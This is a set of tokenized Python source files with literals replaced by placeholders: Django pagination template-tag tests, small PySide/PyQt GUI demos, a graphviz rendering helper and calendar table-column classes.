) <EOL> def test_first_page_argument ( self ) : <EOL> template = '<STR_LIT>' <EOL> _ , context = self . render ( self . request ( ) , template ) <EOL> self . assertRangeEqual ( range ( <NUM_LIT:10> ) , context [ '<STR_LIT>' ] ) <EOL> _ , context = self . render ( self . request ( page = <NUM_LIT:2> ) , template ) <EOL> self . assertRangeEqual ( range ( <NUM_LIT:10> , <NUM_LIT:30> ) , context [ '<STR_LIT>' ] ) <EOL> def test_first_page_argument_as_variable ( self ) : <EOL> template = '<STR_LIT>' <EOL> context_data = { <EOL> '<STR_LIT>' : range ( <NUM_LIT> ) , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } <EOL> _ , context = self . render ( self . request ( ) , template , ** context_data ) <EOL> self . assertSequenceEqual ( [ <NUM_LIT:0> ] , context [ '<STR_LIT>' ] ) <EOL> _ , context = self . render ( <EOL> self . request ( page = <NUM_LIT:2> ) , template , ** context_data ) <EOL> self . assertRangeEqual ( range ( <NUM_LIT:1> , <NUM_LIT> ) , context [ '<STR_LIT>' ] ) <EOL> def test_starting_from_page_argument ( self ) : <EOL> template = '<STR_LIT>' <EOL> _ , context = self . render ( self . request ( ) , template ) <EOL> self . assertRangeEqual ( range ( <NUM_LIT:20> , <NUM_LIT:30> ) , context [ '<STR_LIT>' ] ) <EOL> def test_starting_from_page_argument_as_variable ( self ) : <EOL> template = '<STR_LIT>' <EOL> _ , context = self . render ( <EOL> self . request ( ) , template , entries = range ( <NUM_LIT> ) , mypage = <NUM_LIT:2> ) <EOL> self . assertRangeEqual ( range ( <NUM_LIT:10> , <NUM_LIT:20> ) , context [ '<STR_LIT>' ] ) <EOL> def test_using_argument ( self ) : <EOL> template = '<STR_LIT>' <EOL> _ , context = self . render ( <EOL> self . request ( data = { '<STR_LIT>' : <NUM_LIT:2> } ) , template ) <EOL> self . assertRangeEqual ( range ( <NUM_LIT:20> , <NUM_LIT> ) , context [ '<STR_LIT>' ] ) <EOL> def test_using_argument_as_variable ( self ) : <EOL> template = '<STR_LIT>' <EOL> _ , context = self . render ( <EOL> self . request ( p = <NUM_LIT:3> ) , template , entries = range ( <NUM_LIT> ) , qskey = '<STR_LIT:p>' ) <EOL> self . assertRangeEqual ( range ( <NUM_LIT> , <NUM_LIT> ) , context [ '<STR_LIT>' ] ) <EOL> def test_with_argument ( self ) : <EOL> template = '<STR_LIT>' <EOL> _ , context = self . render ( self . request ( ) , template ) <EOL> self . assertEqual ( '<STR_LIT>' , context [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> def test_with_argument_as_variable ( self ) : <EOL> path = '<STR_LIT>' <EOL> template = '<STR_LIT>' <EOL> _ , context = self . render ( <EOL> self . request ( ) , template , entries = range ( <NUM_LIT> ) , path = path ) <EOL> self . assertEqual ( path , context [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> def test_as_argument ( self ) : <EOL> template = '<STR_LIT>' <EOL> _ , context = self . render ( self . request ( ) , template ) <EOL> self . assertRangeEqual ( range ( <NUM_LIT:20> ) , context [ '<STR_LIT>' ] ) <EOL> self . assertRangeEqual ( range ( <NUM_LIT> ) , context [ '<STR_LIT>' ] ) <EOL> def test_complete_argument_list ( self ) : <EOL> template = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> _ , context = self . render ( <EOL> self . request ( ) , template , objects = range ( <NUM_LIT> ) , mypage = '<STR_LIT>' , <EOL> path = '<STR_LIT>' ) <EOL> self . assertRangeEqual ( range ( <NUM_LIT:5> , <NUM_LIT:15> ) , context [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( '<STR_LIT>' , context [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> def test_invalid_arguments ( self ) : <EOL> templates = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> request = self . request ( ) <EOL> for template in templates : <EOL> with self . assertRaises ( TemplateSyntaxError ) : <EOL> self . render ( request , template ) <EOL> def test_invalid_page ( self ) : <EOL> template = '<STR_LIT>' <EOL> _ , context = self . render ( self . request ( page = <NUM_LIT:0> ) , template ) <EOL> self . assertRangeEqual ( range ( <NUM_LIT:5> ) , context [ '<STR_LIT>' ] ) <EOL> def test_nested_context_variable ( self ) : <EOL> manager = { '<STR_LIT:all>' : range ( <NUM_LIT> ) } <EOL> template = '<STR_LIT>' <EOL> _ , context = self . render ( self . request ( ) , template , manager = manager ) <EOL> self . assertRangeEqual ( range ( <NUM_LIT:5> ) , context [ '<STR_LIT>' ] ) <EOL> def test_failing_nested_context_variable ( self ) : <EOL> manager = { '<STR_LIT:all>' : range ( <NUM_LIT> ) } <EOL> template = '<STR_LIT>' <EOL> with self . assertRaises ( TemplateSyntaxError ) as cm : <EOL> self . render ( self . request ( ) , template , manager = manager ) <EOL> self . assertIn ( '<STR_LIT>' , str ( cm . exception ) ) <EOL> def test_multiple_pagination ( self ) : <EOL> letters = string . ascii_letters <EOL> template = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> _ , context = self . render ( <EOL> self . request ( page = <NUM_LIT:2> , entries = <NUM_LIT:3> ) , template , <EOL> objects = range ( <NUM_LIT> ) , entries = { '<STR_LIT:all>' : letters } , <EOL> items = [ '<STR_LIT:foo>' , '<STR_LIT:bar>' ] , items_page = '<STR_LIT:p>' ) <EOL> self . assertRangeEqual ( range ( <NUM_LIT:10> , <NUM_LIT:30> ) , context [ '<STR_LIT>' ] ) <EOL> self . assertSequenceEqual ( [ '<STR_LIT:foo>' ] , context [ '<STR_LIT>' ] ) <EOL> self . assertSequenceEqual ( letters [ <NUM_LIT:10> : <NUM_LIT:15> ] , context [ '<STR_LIT>' ] ) <EOL> self . assertSequenceEqual ( letters , context [ '<STR_LIT>' ] [ '<STR_LIT:all>' ] ) <EOL> class PaginateTest ( PaginateTestMixin , TestCase ) : <EOL> tagname = '<STR_LIT>' <EOL> def test_starting_from_last_page_argument ( self ) : <EOL> template = '<STR_LIT>' <EOL> _ , context = self . render ( self . request ( ) , template ) <EOL> self . assertRangeEqual ( range ( <NUM_LIT> , <NUM_LIT> ) , context [ '<STR_LIT>' ] ) <EOL> def test_starting_from_negative_page_argument ( self ) : <EOL> template = '<STR_LIT>' <EOL> _ , context = self . render ( self . request ( ) , template ) <EOL> self . assertRangeEqual ( range ( <NUM_LIT:20> , <NUM_LIT:30> ) , context [ '<STR_LIT>' ] ) <EOL> def test_starting_from_negative_page_argument_as_variable ( self ) : <EOL> template = '<STR_LIT>' <EOL> _ , context = self . render ( <EOL> self . request ( ) , template , objects = range ( <NUM_LIT> ) , mypage = - <NUM_LIT:2> ) <EOL> self . assertRangeEqual ( range ( <NUM_LIT:30> , <NUM_LIT> ) , context [ '<STR_LIT>' ] ) <EOL> def test_starting_from_negative_page_out_of_range ( self ) : <EOL> template = '<STR_LIT>' <EOL> _ , context = self . render ( self . request ( ) , template ) <EOL> self . assertRangeEqual ( range ( <NUM_LIT:10> ) , context [ '<STR_LIT>' ] ) <EOL> def test_num_queries ( self ) : <EOL> template = '<STR_LIT>' <EOL> objects = self . assertPaginationNumQueries ( <NUM_LIT:2> , template ) <EOL> self . assertEqual ( <NUM_LIT:10> , len ( objects ) ) <EOL> def test_num_queries_starting_from_another_page ( self ) : <EOL> template = '<STR_LIT>' <EOL> self . assertPaginationNumQueries ( <NUM_LIT:2> , template ) <EOL> def test_num_queries_starting_from_last_page ( self ) : <EOL> template = '<STR_LIT>' <EOL> self . assertPaginationNumQueries ( <NUM_LIT:2> , template ) <EOL> class LazyPaginateTest ( PaginateTestMixin , TestCase ) : <EOL> tagname = '<STR_LIT>' <EOL> def test_starting_from_negative_page_raises_error ( self ) : <EOL> template = '<STR_LIT>' <EOL> with self . assertRaises ( NotImplementedError ) : <EOL> self . render ( self . request ( ) , template ) <EOL> def test_num_queries ( self ) : <EOL> template = '<STR_LIT>' <EOL> objects = self . assertPaginationNumQueries ( <NUM_LIT:1> , template ) <EOL> self . assertEqual ( <NUM_LIT:10> , len ( objects ) ) <EOL> def test_num_queries_starting_from_another_page ( self ) : <EOL> template = '<STR_LIT>' <EOL> self . assertPaginationNumQueries ( <NUM_LIT:1> , template ) <EOL> @ skip_if_old_etree <EOL> class ShowMoreTest ( EtreeTemplateTagsTestMixin , TestCase ) : <EOL> def test_first_page_next_url ( self ) : <EOL> template = '<STR_LIT>' <EOL> tree = self . render ( self . request ( ) , template ) <EOL> link = tree . find ( '<STR_LIT>' ) <EOL> expected = '<STR_LIT>' . format ( PAGE_LABEL , <NUM_LIT:2> ) <EOL> self . assertEqual ( expected , link . attrib [ '<STR_LIT>' ] ) <EOL> def test_page_next_url ( self ) : <EOL> template = '<STR_LIT>' <EOL> tree = self . render ( self . request ( page = <NUM_LIT:3> ) , template ) <EOL> link = tree . find ( '<STR_LIT>' ) <EOL> expected = '<STR_LIT>' . format ( PAGE_LABEL , <NUM_LIT:4> ) <EOL> self . assertEqual ( expected , link . attrib [ '<STR_LIT>' ] ) <EOL> def test_last_page ( self ) : <EOL> template = '<STR_LIT>' <EOL> tree = self . render ( self . request ( page = <NUM_LIT:2> ) , template ) <EOL> self . assertIsNone ( tree ) <EOL> def test_customized_label ( self ) : <EOL> template = '<STR_LIT>' <EOL> tree = self . render ( self . request ( ) , template ) <EOL> link = tree . find ( '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , link . text ) <EOL> def test_customized_loading ( self ) : <EOL> template = '<STR_LIT>' <EOL> tree = self . render ( self . request ( ) , template ) <EOL> loading = tree . find ( '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , loading . text ) <EOL> class GetPagesTest ( TemplateTagsTestMixin , TestCase ) : <EOL> def test_page_list ( self ) : <EOL> template = '<STR_LIT>' <EOL> html , context = self . render ( self . request ( ) , template ) <EOL> self . assertEqual ( '<STR_LIT>' , html ) <EOL> self . assertIn ( '<STR_LIT>' , context ) <EOL> self . assertIsInstance ( context [ '<STR_LIT>' ] , PageList ) <EOL> def test_different_varname ( self ) : <EOL> template = '<STR_LIT>' <EOL> _ , context = self . render ( self . request ( ) , template ) <EOL> self . assertIn ( '<STR_LIT>' , context ) <EOL> self . assertIsInstance ( context [ '<STR_LIT>' ] , PageList ) <EOL> def test_page_numbers ( self ) : <EOL> template = '<STR_LIT>' <EOL> for page_number in range ( <NUM_LIT:1> , <NUM_LIT:5> ) : <EOL> _ , context = self . render ( self . request ( page = page_number ) , template ) <EOL> page = context [ '<STR_LIT>' ] . current ( ) <EOL> self . assertEqual ( page_number , page . number ) <EOL> def test_without_paginate_tag ( self ) : <EOL> template = '<STR_LIT>' <EOL> with self . assertRaises ( PaginationError ) : <EOL> self . render ( self . request ( ) , template ) <EOL> def test_invalid_arguments ( self ) : <EOL> template = '<STR_LIT>' <EOL> request = self . request ( ) <EOL> with self . assertRaises ( TemplateSyntaxError ) : <EOL> self . render ( request , template ) <EOL> def test_starting_from_negative_page_in_another_page ( self ) : <EOL> template = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> _ , context = self . render ( <EOL> self . request ( ) , template , objects = range ( <NUM_LIT> ) , page = <NUM_LIT:1> ) <EOL> page = context [ '<STR_LIT>' ] . last ( ) <EOL> self . assertEqual ( '<STR_LIT>' , page . url ) <EOL> def test_pages_length ( self ) : <EOL> template = '<STR_LIT>' <EOL> html , context = self . render ( self . request ( ) , template ) <EOL> self . assertEqual ( '<STR_LIT:5>' , html ) <EOL> @ skip_if_old_etree <EOL> class ShowPagesTest ( EtreeTemplateTagsTestMixin , TestCase ) : <EOL> def test_current_page ( self ) : <EOL> template = '<STR_LIT>' <EOL> for page_number in range ( <NUM_LIT:1> , <NUM_LIT:6> ) : <EOL> tree = self . render ( self . request ( page = page_number ) , template ) <EOL> current = tree . find ( '<STR_LIT>' ) <EOL> text = '<STR_LIT>' . join ( element . text for element in current ) <EOL> self . assertEqual ( str ( page_number ) , text ) <EOL> def test_links ( self ) : <EOL> template = '<STR_LIT>' <EOL> for page_number in range ( <NUM_LIT:1> , <NUM_LIT:6> ) : <EOL> tree = self . render ( self . request ( page = page_number ) , template ) <EOL> links = tree . findall ( '<STR_LIT>' ) <EOL> expected = <NUM_LIT:5> if page_number == <NUM_LIT:1> or page_number == <NUM_LIT:5> else <NUM_LIT:6> <EOL> self . assertEqual ( expected , len ( links ) ) <EOL> def test_without_paginate_tag ( self ) : <EOL> template = '<STR_LIT>' <EOL> with self . assertRaises ( PaginationError ) : <EOL> self . render ( self . request ( ) , template ) <EOL> def test_invalid_arguments ( self ) : <EOL> template = '<STR_LIT>' <EOL> request = self . request ( ) <EOL> with self . assertRaises ( TemplateSyntaxError ) : <EOL> self . render ( request , template ) <EOL> class ShowCurrentNumberTest ( TemplateTagsTestMixin , TestCase ) : <EOL> def test_current_number ( self ) : <EOL> template = '<STR_LIT>' <EOL> for page_number in range ( <NUM_LIT:1> , <NUM_LIT:6> ) : <EOL> html , _ = self . render ( self . request ( page = page_number ) , template ) <EOL> self . assertEqual ( page_number , int ( html ) ) <EOL> def test_starting_from_page_argument ( self ) : <EOL> template = '<STR_LIT>' <EOL> html , _ = self . render ( self . request ( ) , template ) <EOL> self . assertEqual ( <NUM_LIT:3> , int ( html ) ) <EOL> def test_starting_from_page_argument_as_variable ( self ) : <EOL> template = '<STR_LIT>' <EOL> html , _ = self . render ( <EOL> self . request ( ) , template , entries = range ( <NUM_LIT> ) , mypage = <NUM_LIT:2> ) <EOL> self . assertEqual ( <NUM_LIT:2> , int ( html ) ) <EOL> def test_using_argument ( self ) : <EOL> template = '<STR_LIT>' <EOL> html , _ = self . render ( <EOL> self . request ( mypage = <NUM_LIT:2> ) , template ) <EOL> self . assertEqual ( <NUM_LIT:2> , int ( html ) ) <EOL> def test_using_argument_as_variable ( self ) : <EOL> template = '<STR_LIT>' <EOL> html , _ = self . render ( <EOL> self . request ( p = <NUM_LIT:5> ) , template , entries = range ( <NUM_LIT> ) , qskey = '<STR_LIT:p>' ) <EOL> self . assertEqual ( <NUM_LIT:5> , int ( html ) ) <EOL> def test_as_argument ( self ) : <EOL> template = '<STR_LIT>' <EOL> html , context = self . render ( self . request ( page = <NUM_LIT:4> ) , template ) <EOL> self . assertEqual ( '<STR_LIT>' , html ) <EOL> self . assertIn ( '<STR_LIT>' , context ) <EOL> self . assertEqual ( <NUM_LIT:4> , context [ '<STR_LIT>' ] ) <EOL> def test_complete_argument_list ( self ) : <EOL> template = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> html , context = self . render ( <EOL> self . request ( ) , template , objects = range ( <NUM_LIT> ) , mypage = '<STR_LIT>' ) <EOL> self . assertEqual ( <NUM_LIT:2> , context [ '<STR_LIT>' ] ) <EOL> def test_invalid_arguments ( self ) : <EOL> templates = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> request = self . request ( ) <EOL> for template in templates : <EOL> with self . assertRaises ( TemplateSyntaxError ) : <EOL> self . render ( request , template ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> try : <EOL> from PySide import QtCore <EOL> from PySide import QtGui <EOL> except ImportError : <EOL> from PyQt4 import QtCore <EOL> from PyQt4 import QtGui <EOL> default_settings = { <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> } <EOL> class CustomDlg ( QtGui . QDialog ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , parent , settings ) : <EOL> super ( CustomDlg , self ) . __init__ ( parent ) <EOL> self . resize ( <NUM_LIT> , <NUM_LIT> ) <EOL> self . _settings = settings <EOL> self . setModal ( True ) <EOL> def keyPressEvent ( self , evt ) : <EOL> close_win_cmd_w = ( evt . key ( ) == QtCore . Qt . Key_W and evt . modifiers ( ) == QtCore . Qt . ControlModifier ) <EOL> close_win_esc = ( evt . key ( ) == QtCore . Qt . Key_Escape ) <EOL> if close_win_cmd_w or close_win_esc : <EOL> self . close ( ) <EOL> return self . _settings <EOL> def get_inputs ( self ) : <EOL> return self . _settings <EOL> @ staticmethod <EOL> def popup_and_get_inputs ( parent , settings ) : <EOL> dlg = CustomDlg ( parent , settings ) <EOL> dlg . show ( ) <EOL> dlg . exec_ ( ) <EOL> class QuitConfirmDlg ( CustomDlg ) : <EOL> def __init__ ( self , parent , settings ) : <EOL> super ( QuitConfirmDlg , self ) . __init__ ( parent , settings ) <EOL> self . resize ( <NUM_LIT> , <NUM_LIT> ) <EOL> self . tips_label = QtGui . QLabel ( "<STR_LIT>" , self ) <EOL> self . tips_label . setGeometry ( QtCore . QRect ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:15> ) ) <EOL> self . minimize_rbtn = QtGui . QRadioButton ( "<STR_LIT>" , self ) <EOL> self . minimize_rbtn . setGeometry ( QtCore . QRect ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:20> ) ) <EOL> self . exit_rbtn = QtGui . QRadioButton ( "<STR_LIT>" , self ) <EOL> self . exit_rbtn . setGeometry ( QtCore . QRect ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:20> ) ) <EOL> self . no_confirm_cbox = QtGui . QCheckBox ( "<STR_LIT>" , self ) <EOL> self . no_confirm_cbox . setGeometry ( QtCore . QRect ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:20> ) ) <EOL> self . minimize_rbtn . setChecked ( not self . _settings [ '<STR_LIT>' ] ) <EOL> self . exit_rbtn . setChecked ( self . _settings [ '<STR_LIT>' ] ) <EOL> self . no_confirm_cbox . setChecked ( not self . _settings [ '<STR_LIT>' ] ) <EOL> def get_inputs ( self ) : <EOL> self . _settings [ "<STR_LIT>" ] = self . exit_rbtn . isChecked ( ) <EOL> self . _settings [ "<STR_LIT>" ] = not self . no_confirm_cbox . isChecked ( ) <EOL> return self . _settings <EOL> @ staticmethod <EOL> def popup_and_get_inputs ( parent , settings ) : <EOL> dlg = QuitConfirmDlg ( parent , settings ) <EOL> dlg . show ( ) <EOL> dlg . exec_ ( ) <EOL> return dlg . get_inputs ( ) <EOL> class Demo ( QtGui . QWidget ) : <EOL> def __init__ ( self ) : <EOL> super ( Demo , self ) . __init__ ( ) <EOL> x , y , w , h = <NUM_LIT> , <NUM_LIT:200> , <NUM_LIT> , <NUM_LIT> <EOL> self . setGeometry ( x , y , w , h ) <EOL> self . settings_btn = QtGui . QPushButton ( "<STR_LIT>" , self ) <EOL> self . settings_btn . clicked . connect ( self . _settings_btn_clicked ) <EOL> def _settings_btn_clicked ( self ) : <EOL> global default_settings <EOL> settings = default_settings <EOL> default_settings = QuitConfirmDlg . popup_and_get_inputs ( self , settings ) <EOL> print "<STR_LIT>" , default_settings <EOL> def show_and_raise ( self ) : <EOL> self . show ( ) <EOL> self . raise_ ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> app = QtGui . QApplication ( sys . argv ) <EOL> demo = Demo ( ) <EOL> demo . show_and_raise ( ) <EOL> sys . exit ( app . exec_ ( ) ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> try : <EOL> from PySide import QtCore <EOL> from PySide import QtGui <EOL> except ImportError : <EOL> from PyQt4 import QtCore <EOL> from PyQt4 import QtGui <EOL> def config_theme_path ( ) : <EOL> if sys . platform != "<STR_LIT>" : <EOL> return <EOL> theme_name = str ( QtGui . QIcon . themeName ( ) ) <EOL> if theme_name != "<STR_LIT>" : <EOL> QtGui . QIcon . setThemeName ( "<STR_LIT>" ) <EOL> search_paths = list ( QtGui . QIcon . themeSearchPaths ( ) ) <EOL> custom_path = "<STR_LIT>" <EOL> if custom_path not in search_paths : <EOL> search_paths . append ( custom_path ) <EOL> QtGui . QIcon . setThemeSearchPaths ( search_paths ) <EOL> class Demo ( QtGui . QMainWindow ) : <EOL> def __init__ ( self ) : <EOL> super ( Demo , self ) . __init__ ( ) <EOL> x , y , w , h = <NUM_LIT> , <NUM_LIT:200> , <NUM_LIT> , <NUM_LIT> <EOL> self . setGeometry ( x , y , w , h ) <EOL> self . setUnifiedTitleAndToolBarOnMac ( True ) <EOL> config_theme_path ( ) <EOL> icon = QtGui . QIcon . fromTheme ( '<STR_LIT>' ) <EOL> exit_a = QtGui . QAction ( icon , '<STR_LIT>' , self ) <EOL> exit_a . setShortcut ( '<STR_LIT>' ) <EOL> exit_a . triggered . connect ( self . close ) <EOL> toolbar = self . addToolBar ( '<STR_LIT>' ) <EOL> toolbar . addAction ( exit_a ) <EOL> self . _toolbar = toolbar <EOL> def show_and_raise ( self ) : <EOL> self . show ( ) <EOL> self . raise_ ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> app = QtGui . QApplication ( sys . argv ) <EOL> demo = Demo ( ) <EOL> demo . show_and_raise ( ) <EOL> sys . exit ( app . exec_ ( ) ) </s>
<s> """<STR_LIT>""" <EOL> from PySide import QtGui <EOL> fmts = [ str ( i ) for i in QtGui . QImageReader . supportedImageFormats ( ) ] <EOL> print fmts </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import time <EOL> import threading <EOL> try : <EOL> from PySide import QtCore <EOL> from PySide import QtGui <EOL> except ImportError : <EOL> from PyQt4 import QtCore <EOL> from PyQt4 import QtGui <EOL> class Demo ( QtGui . QWidget ) : <EOL> def __init__ ( self ) : <EOL> super ( Demo , self ) . __init__ ( ) <EOL> x , y , w , h = <NUM_LIT> , <NUM_LIT:200> , <NUM_LIT> , <NUM_LIT> <EOL> self . setGeometry ( x , y , w , h ) <EOL> def foo ( ) : <EOL> time . sleep ( <NUM_LIT:2> ) <EOL> QtGui . QApplication . alert ( self ) <EOL> t = threading . Thread ( target = foo ) <EOL> t . start ( ) <EOL> def show_and_raise ( self ) : <EOL> self . show ( ) <EOL> self . raise_ ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> app = QtGui . QApplication ( sys . argv ) <EOL> demo = Demo ( ) <EOL> demo . show_and_raise ( ) <EOL> sys . exit ( app . exec_ ( ) ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import pygraphviz <EOL> __all__ = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] <EOL> def dot_text2png ( text , png_path , prog = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> text = text . strip ( ) <EOL> filename = str ( hash ( text ) ) . replace ( "<STR_LIT:->" , "<STR_LIT>" ) <EOL> fullname = filename + "<STR_LIT>" <EOL> if os . path . isdir ( png_path ) : <EOL> save_to_prefix = png_path <EOL> else : <EOL> save_to_prefix = os . path . dirname ( png_path ) <EOL> png_path = os . path . join ( save_to_prefix , fullname ) <EOL> if os . path . exists ( png_path ) : <EOL> return png_path <EOL> g = pygraphviz . AGraph ( text ) <EOL> g . layout ( prog = prog ) <EOL> g . draw ( png_path ) <EOL> return png_path <EOL> def dot_file2png ( dot_path , png_path ) : <EOL> """<STR_LIT>""" <EOL> text = file ( dot_path ) . read ( ) <EOL> return dot_text2png ( text = text , png_path = png_path ) <EOL> test_text = """<STR_LIT>""" <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> save_to_prefix = "<STR_LIT>" <EOL> if not os . path . exists ( save_to_prefix ) : <EOL> os . makedirs ( save_to_prefix ) <EOL> png_path = save_to_prefix <EOL> png_path = "<STR_LIT>" <EOL> dst_path = dot_text2png ( test_text , png_path ) <EOL> msg = "<STR_LIT>" + dst_path <EOL> print msg </s>
<s> class Breakpoint ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , file_name , line_number , condition ) : <EOL> super ( Breakpoint , self ) . __init__ ( ) <EOL> self . file_name = file_name <EOL> self . line_number = line_number <EOL> self . condition = condition </s>
<s> import calendar <EOL> from datetime import timedelta <EOL> from table . columns . base import Column <EOL> from table . columns . sequencecolumn import SequenceColumn <EOL> class DaysColumn ( SequenceColumn ) : <EOL> def __init__ ( self , field = None , start_date = None , end_date = None , ** kwargs ) : <EOL> total_days = ( end_date - start_date ) . days + <NUM_LIT:1> <EOL> headers = [ ( start_date + timedelta ( day ) ) . strftime ( "<STR_LIT>" ) <EOL> for day in range ( total_days ) ] <EOL> super ( DaysColumn , self ) . __init__ ( field , headers , ** kwargs ) <EOL> class WeeksColumn ( SequenceColumn ) : <EOL> WEEK_NAME = calendar . day_abbr <EOL> def __init__ ( self , field = None , start_date = None , end_date = None , ** kwargs ) : <EOL> total_days = ( end_date - start_date ) . days + <NUM_LIT:1> <EOL> headers = [ self . WEEK_NAME [ ( start_date + timedelta ( day ) ) . weekday ( ) ] <EOL> for day in range ( total_days ) ] <EOL> super ( WeeksColumn , self ) . __init__ ( field , headers , ** kwargs ) <EOL> class MonthsColumn ( SequenceColumn ) : <EOL> MONTH_NAME = calendar . month_name [ <NUM_LIT:1> : ] <EOL> def __init__ ( self , field = None , start_date = None , end_date = None , ** kwargs ) : <EOL> delta_year = end_date . year - start_date . year <EOL> delta_month = end_date . month - start_date . month <EOL> total_months = delta_year * <NUM_LIT:12> + delta_month + <NUM_LIT:1> <EOL> headers = [ self . MONTH_NAME [ ( start_date . month + month - <NUM_LIT:1> ) % <NUM_LIT:12> ] <EOL> for month in range ( total_months ) ] <EOL> super ( MonthsColumn , self ) . __init__ ( field , headers , ** kwargs ) <EOL> class InlineDaysColumn ( DaysColumn ) : <EOL> def __init__ ( self , field = None , start_date = None , end_date = None , ** kwargs ) : <EOL> kwargs [ '<STR_LIT>' ] = False <EOL> kwargs . setdefault ( '<STR_LIT>' , { } ) <EOL> kwargs [ '<STR_LIT>' ] . update ( { '<STR_LIT:class>' : '<STR_LIT>' } ) <EOL> super ( InlineDaysColumn , self ) . __init__ ( field , start_date , end_date , ** kwargs ) <EOL> class InlineWeeksColumn ( WeeksColumn ) : <EOL> def __init__ ( self , start_date = None , end_date = None , ** kwargs ) : <EOL> kwargs [ '<STR_LIT>' ] = False <EOL> kwargs [ '<STR_LIT>' ] = False <EOL> kwargs . setdefault ( '<STR_LIT>' , { } ) <EOL> kwargs [ '<STR_LIT>' ] . update ( { '<STR_LIT:class>' : '<STR_LIT>' } ) <EOL> super ( InlineWeeksColumn , self ) . __init__ ( start_date = start_date , end_date = end_date , ** kwargs ) <EOL> class InlineMonthsColumn ( MonthsColumn ) : <EOL> def __init__ ( self , start_date = None , end_date = None , ** kwargs ) : <EOL> self . start_date = start_date <EOL> self . end_date = end_date <EOL> kwargs [ '<STR_LIT>' ] = False <EOL> kwargs [ '<STR_LIT>' ] = False <EOL> super ( InlineMonthsColumn , self ) . __init__ ( start_date = start_date , end_date = end_date , ** kwargs ) <EOL> def get_column ( self , key ) : <EOL> return Column ( field = self . get_field ( key ) , <EOL> header = self . get_header ( key ) , <EOL> header_attrs = self . get_column_header_attrs ( key ) , <EOL> ** self . kwargs ) <EOL> def get_column_header_attrs ( self , index ) : <EOL> header_attrs = self . kwargs . pop ( "<STR_LIT>" , { } ) <EOL> header_attrs . update ( { "<STR_LIT>" : self . get_column_span ( index ) } ) <EOL> return header_attrs <EOL> def get_column_span ( self , index ) : <EOL> """<STR_LIT>""" <EOL> return str ( self . get_days_span ( index ) ) <EOL> def get_days_span ( self , month_index ) : <EOL> """<STR_LIT>""" <EOL> is_first_month = month_index == <NUM_LIT:0> <EOL> is_last_month = month_index == self . __len__ ( ) - <NUM_LIT:1> <EOL> y = int ( self . start_date . year + ( self . start_date . month + month_index ) / <NUM_LIT> ) <EOL> m = int ( ( self . start_date . month + month_index ) % <NUM_LIT:12> or <NUM_LIT:12> ) <EOL> total = calendar . monthrange ( y , m ) [ <NUM_LIT:1> ] <EOL> if is_first_month and is_last_month : <EOL> return ( self . end_date - self . start_date ) . days + <NUM_LIT:1> <EOL> else : <EOL> if is_first_month : <EOL> return total - self . start_date . day + <NUM_LIT:1> <EOL> elif is_last_month : <EOL> return self . end_date . day <EOL> else : <EOL> return total <EOL> class CalendarColumn ( SequenceColumn ) : <EOL> MonthsColumnClass = InlineMonthsColumn <EOL> WeeksColumnClass = InlineWeeksColumn <EOL> DaysColumnClass = InlineDaysColumn <EOL> def __init__ ( self , field , start_date , end_date , ** kwargs ) : <EOL> self . months_column = self . MonthsColumnClass ( start_date , end_date , ** kwargs ) <EOL> self . weeks_column = self . WeeksColumnClass ( start_date , end_date , header_row_order = <NUM_LIT:1> ) <EOL> self . days_column = self . DaysColumnClass ( field , start_date , end_date , header_row_order = <NUM_LIT:2> ) <EOL> headers = self . months_column . headers + self . weeks_column . headers + self . days_column . headers <EOL> super ( CalendarColumn , self ) . __init__ ( field , headers , ** kwargs ) <EOL> @ property <EOL> def columns ( self ) : <EOL> return self . months_column . columns + self . weeks_column . columns + self . days_column . columns </s>
